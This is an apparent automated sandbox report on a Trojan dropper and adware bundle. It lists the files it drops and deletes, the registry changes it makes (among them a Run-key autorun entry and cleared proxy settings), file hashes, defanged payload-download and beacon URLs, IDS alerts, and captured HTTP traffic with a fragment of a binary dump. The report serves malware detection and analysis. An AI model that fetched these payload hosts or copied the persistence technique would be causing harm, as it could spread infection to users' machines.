C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\gnc.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\xmlconfig (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\7zxr.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\letian.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\setting.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\background.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\xmlconfig\uninstall.xml (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\htfixfunction.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\tap.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\ebay.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\6pm.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\radio.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\progress_bar.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\uninst_complete.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\inst_successfully.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\scrollArrowUp.bmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\chromeNativeClient (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\menuButton.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\extensionWarn.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon48_48.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\contentscript.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon128_128.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\return.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\htwebHelper.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\box_check.png (0 bytes)

The process webfriend2.exe:2756 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-R6MIP.tmp\webfriend2.tmp (1429 bytes)

The process %original file name%.exe:3380 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\T7QO7T4H.txt (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XSZEUUBG.txt (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026566\webfriend2.exe (144837 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026442\20002.exe (143808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026403\msiql.exe (259462 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026383\20002.exe (143808 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026383\20002.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026442\20002.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026403\msiql.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XSZEUUBG.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\20002[1].exe (0 bytes)

The process webfriend2.tmp:2704 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Leawo Commandision\is-KG2HA.tmp (16158 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-9H2MC.tmp\_isetup\_iscrypt.dll (6 bytes)
%Program Files%\Leawo Commandision\is-NV2MC.tmp (41 bytes)

The process msiql.exe:1660 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\swapfile.ini (208 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026416\popnew.xml (388 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\tmp1660aaaaaa (173 bytes)

The process msiql.exe:3536 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\swapfile.ini (104 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\tmp3536aaaaaa (173 bytes)

The process rundll32.exe:2532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Leawo Commandision\Leawo Commandision.dll (146 bytes)
%Program Files%\Leawo Commandision\954872365 (56 bytes)

Registry activity

The process %original file name%.exe:3380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\fb0067556893d3d8bc2ead097f084722_RASMANCS]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\fb0067556893d3d8bc2ead097f084722_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\fb0067556893d3d8bc2ead097f084722_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\fb0067556893d3d8bc2ead097f084722_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\fb0067556893d3d8bc2ead097f084722_RASAPI32]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\fb0067556893d3d8bc2ead097f084722_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\fb0067556893d3d8bc2ead097f084722_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\fb0067556893d3d8bc2ead097f084722_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

"FileDirectory" = "%windir%\tracing"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process msiql.exe:1660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\PopWnd]
"InsTM" = "Type: REG_QWORD, Length: 8"

[HKCU\Software\PopWnd\actv]
"(Default)" = ""

[HKCU\Software\PopWnd]
"lastloadtime" = "Type: REG_QWORD, Length: 8"
"Days" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"msiql" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026403\msiql.exe /RUNNING"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

The process msiql.exe:3536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\msiql_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\PopWnd]
"TmN" = "12345"

[HKLM\SOFTWARE\Microsoft\Tracing\msiql_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\PopWnd]
"TmSN" = ""

[HKLM\SOFTWARE\Microsoft\Tracing\msiql_RASAPI32]
"MaxFileSize" = "1048576"

"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\msiql_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\msiql_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\msiql_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\msiql_RASMANCS]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\msiql_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\msiql_RASAPI32]
"FileTracingMask" = "4294901760"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"msiql" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026403\msiql.exe /RUNNING"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

Dropped PE files

MD5	File path
643c54452902067ca860c2a491703ddd	c:\Program Files\Leawo Commandision\Leawo Commandision.dll
6adb4f8219a16f475ec87f8374cb3cdf	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026403\msiql.exe
0998bac5f58e6921165137b5dc3df38b	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026566\webfriend2.exe
45b2fb7d0db70157851fda33020978c2	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\20002.exe.dat
f481e9c92cf97beaa5e8ba1ab04c136c	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\7zxr.dll
bd971559c7a8064ae73cdccef8163b55	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTDataView.dll
8411a40ac065f10788b77b23cfa4c5e5	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTDataView64.dll
169c0ec72d2d2932f3d5923c6559ad5c	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTUninst.exe
b7cad4e4c5c29f712b592245947dbbd0	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\chromeNativeClient\chromeht.exe
9d755cd8c40f6ea4b2d7b3185df213cc	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\haitao.exe
371efba5dc3dc61ae738c20beed33384	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\htfixfunction.dll
6a2db75c8e7a68aafc105ebb7dc15e2d	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\htwebHelper.dll
a69559718ab506675e907fe49deb71e9	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-9H2MC.tmp\_isetup\_iscrypt.dll
832dab307e54aa08f4b6cdd9b9720361	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-R6MIP.tmp\webfriend2.tmp

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	1613496	1613824	4.49225	8da6ca91c3569ff080a4f75478f6c727
.rdata	1617920	381796	381952	3.57983	a55a6ae4b0df69ee40f231423b3e603d
.data	2002944	91284	41472	3.63295	64cdbcc120004f2897b19af1f755cd4e
.gfids	2097152	4644	5120	2.6637	6410b8af8276779b175e15c9c485139c
.tls	2105344	9	512	0.014135	1f354d76203061bfdd5a53dae48d5435
.rsrc	2109440	488	512	3.2941	7f05c3393a6996db4d22c7c37494fd2c
.reloc	2113536	82692	82944	4.57475	38ac4d6f998eb3534f0e7e0f3377be6c

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://e6640.g.akamaiedge.net/js/geo2.js
hxxp://int.dpool.sina.com.cn/iplookup/iplookup.php	180.149.138.197
hxxp://xiaobingdou.com/anzhuang.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1ODRCOEU1N0QzMzhBQzQ0N0E5N0ZEMjRCQTI3QzE2RDU1ODE4QkUyQkRCNjk5M0EyQkUzQkUxMzY4NjdEQTcyQkU=	23.234.26.217
hxxp://xiaobingdou.com/reportInstallaa.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1OEE1MkIwNURFRjg2Nzc4RDI1NzIyRUNGMjM1MUZFMTM3MzcxQUVFODQ0RUIxM0Q2NDA5QTQ3RDkzRTI4NjdFNDNBNjcyMDY1NDc2QTQ5NTA4ODJEMDFDOEI1MkIxNDk2OTc0MEMyMjVCQkIzRTk1RjU5MDI1NUVBMDRDNzJBQzA5RDM5NUZCNjk1NEU2QjY4NkJFOTQ1NDU2NEFCRjA0NkI=	23.234.26.217
hxxp://down.yeadesktop.com/offer/msiql.exe	104.18.36.179
hxxp://down.yeadesktop.com/offer/service.exe	104.18.36.179
hxxp://xiaobingdou.com/jihuo.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1ODUyM0QwODA1RTU4N0M3NzE4OUFFQTE1RDdDN0JGRTFBQjAyOEM3NTUxNkJCNzU1RDEzRjUzNzg5QkRFRTBBOThEMzlDQTZGRDYyNzA1MzI0RjIwNThCQTJFRkY3NDY2NjM1MTBDMUQxQ0Q0NUZFRDREQ0U5M0Y4MzZDMzhCM0Ez	23.234.26.217
hxxp://xiaobingdou.com/reportInstallaa.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1OEE1MkIwNURFRjg2Nzc4RDI1NzIyRUNGMjM1MUZFMTM3MDhDNzg5MTZDNjhDRUVFNTg3NjVDMkZBMjVFNDU5NjU4MTZEMEYzOTY3MkZCNkE5NUMzOUNDNkQxNTE2M0Q5NTlEQzMyNDg4N0VGRUE3Q0FBNEM5NTNERTQwNjlDMjYxMzMyQTY1NzhBODFENzAzMDc0NDM2QzQ0OUQwODc0QTZCRDcwMjM0OTAyQzY3NTY0MzBCMjYxMDBGQUQ5QkU5MTM2OTMxM0M1N0JBMkI1QzQ3QjkxOUM5NzNFNTg1NDI0	23.234.26.217
hxxp://dl-o.1haitao.com.w.kunlunar.com/20002.exe	195.27.31.225
hxxp://xiaobingdou.com/reportInstallaa.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1OEE1MkIwNURFRjg2Nzc4RDI1NzIyRUNGMjM1MUZFMTM3MDhDNzg5MTZDNjhDRUVFNTg3NjVDMkZBMjVFNDU5NjUwQ0VDRDVGQUM1OTk0RTgzMDlGRTlFMjNFNDE4Q0RBQUUwQzFENkMzMTFDQjM1MDZGNzI2OEE4NTM2RTFGN0Y2MzBDNjk4OTI0MjFCNUVFRTAxNkU1QzU1MTM1NkRBRTREODdFMUUyNjIwMUQ5RjNFMDFCQTkwQzgxQzVENkREODAxQ0U0RDVENThGOTJFNjVERjhGNzU2RjU1NzFEQkI5	23.234.26.217
hxxp://xiaobingdou.com/reportInstallaa.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1OEE1MkIwNURFRjg2Nzc4RDI1NzIyRUNGMjM1MUZFMTM3MDhDNzg5MTZDNjhDRUVFNTg3NjVDMkZBMjVFNDU5NjU4MTZEMEYzOTY3MkZCNkE5NUMzOUNDNkQxNTE2M0Q5NUFDNTZFRUJDNEUyNTQzODNFODA2QjQ0RkMwRUE0RDE2RkM1N0Q0RjQzQ0FFQkZEN0YxRDM3QUVCMTIzMDkzODM1MUVGRjlEMEU1MTMwMzQ5OUZBMTFGQkQ1MDQ2NUU3QjQ1QjE3RTBFQjAxOTJBRkZDOEYzQ0IwQjZBRkQyQURB	23.234.26.217
hxxp://config.yeadesktop.com/upgrade/9001.xml	128.1.162.234
hxxp://xiaobingdou.com/reportInstallaaFinish.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1OEE1MkIwNURFRjg2Nzc4RDI1NzIyRUNGMjM1MUZFMTM3MDhDNzg5MTZDNjhDRUVFNTg3NjVDMkZBMjVFNDU5NjUwQ0VDRDVGQUM1OTk0RTgzMDlGRTlFMjNFNDE4Q0RBQUVFMzdBRDBCQTFDQkU1QTVDN0ZGRTAyN0YxNTYwM0VDMTI3MzZCODNCQTgyQzM5RDJERjBDMDdENTUyODAyNjQxRTNGRTZDRjlEMDcxNzNCMTBFM0Q0RkJFNDYwRjE3Qg==	23.234.26.217
hxxp://down.yeadesktop.com/upgrade/popwndup.exe	104.18.36.179
hxxp://xiaobingdou.com/reportInstallaaFinish.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1OEE1MkIwNURFRjg2Nzc4RDI1NzIyRUNGMjM1MUZFMTM3MDhDNzg5MTZDNjhDRUVFNTg3NjVDMkZBMjVFNDU5NjU4MTZEMEYzOTY3MkZCNkE5NUMzOUNDNkQxNTE2M0Q5NUFDNTZFRUJDNEUyNTQzODNFODA2QjQ0RkMwRUE0RDE2NUQ0MUI0QjQwMDRCNUFFQzg4RTIzMkY5QTI5NTg4NTI3RjBGNzgyNjAxNkFCQTg1RkUwRjQ1MDdBQTY2QTM5RQ==	23.234.26.217
hxxp://xiaobingdou.com/anzhuang.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRURBOTFGNTNDNDFBMEVDRDk0ODkwODc3NUMxMTJCQjU5QUZGNzNCMTM4QkUxRUQ1Qjg0NDNCMjA4RjcwM0M1QUNFQTcxMzA0MTAzREQ4OTEzQUFCNzM0Njk2MEZGMTcxNUI=	23.234.26.217
hxxp://config.yeadesktop.com/Histlst/popnew.xml	128.1.162.234
hxxp://xiaobingdou.com/jihuo.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRURBOTFGNTNDNDFBMEVDRDk0ODkwODc3NUMxMTJCQjU5QUIwODVGOEZBRkVBNEQ0NzdCNTFCNEU3MTE1NEMzOEJENTc0ODE3ODFDRjAxNDM3QTE2MTRGN0I5NEZERUJEQTRBM0I1N0M4NDI2RjU0RjE3MDU5OTkwNTQ3RTY0OTM2MTA3MjIyRkY1NjYwMzlDQzY0NDIxNUE4RDkxNTJGQ0Y5	23.234.26.217
hxxp://xiaobingdou.com/anzhuang.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQxNUY5M0U4RTk1NUQ5RTc2RTMyNDUxOUQ5RkI5Nzg5MkJDMTFDMTEyNDVDMjM0NEE4N0NDOEY3N0I1QjJFREEwQjc3NTBFNEY3Q0Q0QjhERUMyQTYyMERERjI3MzA3NEY=	23.234.26.217
hxxp://xiaobingdou.com/jihuo.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQxNUY5M0U4RTk1NUQ5RTc2RTMyNDUxOUQ5RkI5Nzg5MjIwRDc5QzBBNDM2NDk2ODgxRDAwQjczRjcxRjlFRkM3Nzg1NDlFMjY0RUI4MTg4NjBEQjVBODFGMTk0OUY1QTVBRTkyREQ1Njk0N0ZBNTA5MUVCNTFGNzJDRjkzNTYyMjhFQzc4RjJGRDE1NTg1MUYzRTBDQTlGNUZGOEM4MTkx	23.234.26.217
hxxp://pop.yeaplayer.com/get.aspx?url=hxxp://www.yeadesktop.com/	192.126.112.118
hxxp://pop.yeaplayer.com/get.aspx?url=hxxp://qtipr.com/	192.126.112.118
hxxp://pop.yeaplayer.com/get.aspx?url=hxxp://yeadesktopbr.com/	192.126.112.118
hxxp://quadratempbayinfo.com/data/webfriend2.exe
hxxp://quadratempbayinfo.com/data/exefiles/webfriend1502893460.exe
hxxp://dl-o.1haitao.com/20002.exe	195.27.31.225
hxxp://cdn3.optimizely.com/js/geo2.js	23.64.225.232

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE Double User-Agent (User-Agent User-Agent)
ET POLICY PE EXE or DLL Windows file download HTTP
ET TROJAN Suspicious User-Agent (Agent and 5 or 6 digits)
ET POLICY External IP Lookup sina.com.cn
ET POLICY Abnormal User-Agent No space after colon - Likely Hostile
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /20002.exe HTTP/1.1

Accept: */*

User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: dl-o.1haitao.com



......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
....h?B..H.P.u..u..u....q@..B...SV.5p?B..E.WP.u....q@..e...E..E.P.u...
.q@..}..e....Pp@........FR..VV..U... M.......M....3.....FQ.....NU..M..
........VT..U.....FP..E...............E.P.M...Xp@..E...E.P.E.P.u....r@
..u....E..9}...w....~X.te.v4..Hp@....E.tU.}.j.W.E......E.......Dp@..vX
W..Lp@..u..5@p@.W...E..E.h ...Pj.h`7B.W...r@..u.W...u....E.P.u...Pr@._
^3.[.....L$...?B...Si.....VW.T.....tO.q.3.;5.?B.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5.?B.r._^[...U..QQ.U.SV..i.....
...?B.3...W.M..M..F...t.9M.t.$.B.F.;..?B.sD..i......|...B......t.j.R..
........u(..@t..E....t..E....E.;..?B...r.3._^[.....}..t..}..t..N.@...N
........N....L$...?B.V3... s495.?B.v,.P.W....u.3.G...z.t.....$...F....
..;5.?B.r._^...U......p?B..e..SV.....W.=.?B..E..E.3.9.tK;.sE.5.?B.....
....u(.E...t..<..t..M.3.@......N.#....M...;.u.C......;.r.;.t..E..E.
..}. r..E._^[.....D$...}.@..PB.... .Q..I.....V.t$..j.....?B.k.....8.t\
P.....=....tUP.......u.@F..H.... ..|$..t/..L7B.j..547B.h0u...5L7B...8q
@.Ph.....t$....q@...}.3.^...........D$...p?B.j..t.l.i......h0.@..t$...
;.....U.........h?B.SV.u.Wj.Y.}..E.3....E..U..........PB..].........M.
..(.@..M......A..5....$..(@.SP.v;.........,7B.9].......S..$r@.....<<< skipped >>>

GET /reportInstallaa.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1OEE1MkIwNURFRjg2Nzc4RDI1NzIyRUNGMjM1MUZFMTM3MDhDNzg5MTZDNjhDRUVFNTg3NjVDMkZBMjVFNDU5NjUwQ0VDRDVGQUM1OTk0RTgzMDlGRTlFMjNFNDE4Q0RBQUUwQzFENkMzMTFDQjM1MDZGNzI2OEE4NTM2RTFGN0Y2MzBDNjk4OTI0MjFCNUVFRTAxNkU1QzU1MTM1NkRBRTREODdFMUUyNjIwMUQ5RjNFMDFCQTkwQzgxQzVENkREODAxQ0U0RDVENThGOTJFNjVERjhGNzU2RjU1NzFEQkI5 HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: xiaobingdou.com


HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:28 GMT

Connection: close

Content-Length: 0

GET /anzhuang.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQxNUY5M0U4RTk1NUQ5RTc2RTMyNDUxOUQ5RkI5Nzg5MkJDMTFDMTEyNDVDMjM0NEE4N0NDOEY3N0I1QjJFREEwQjc3NTBFNEY3Q0Q0QjhERUMyQTYyMERERjI3MzA3NEY= HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: xiaobingdou.com


HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:31 GMT

Connection: close

Content-Length: 0

GET /reportInstallaa.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1OEE1MkIwNURFRjg2Nzc4RDI1NzIyRUNGMjM1MUZFMTM3MDhDNzg5MTZDNjhDRUVFNTg3NjVDMkZBMjVFNDU5NjU4MTZEMEYzOTY3MkZCNkE5NUMzOUNDNkQxNTE2M0Q5NTlEQzMyNDg4N0VGRUE3Q0FBNEM5NTNERTQwNjlDMjYxMzMyQTY1NzhBODFENzAzMDc0NDM2QzQ0OUQwODc0QTZCRDcwMjM0OTAyQzY3NTY0MzBCMjYxMDBGQUQ5QkU5MTM2OTMxM0M1N0JBMkI1QzQ3QjkxOUM5NzNFNTg1NDI0 HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: xiaobingdou.com


HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:37 GMT

Connection: close

Content-Length: 0

GET /get.aspx?url=hXXp://yeadesktopbr.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

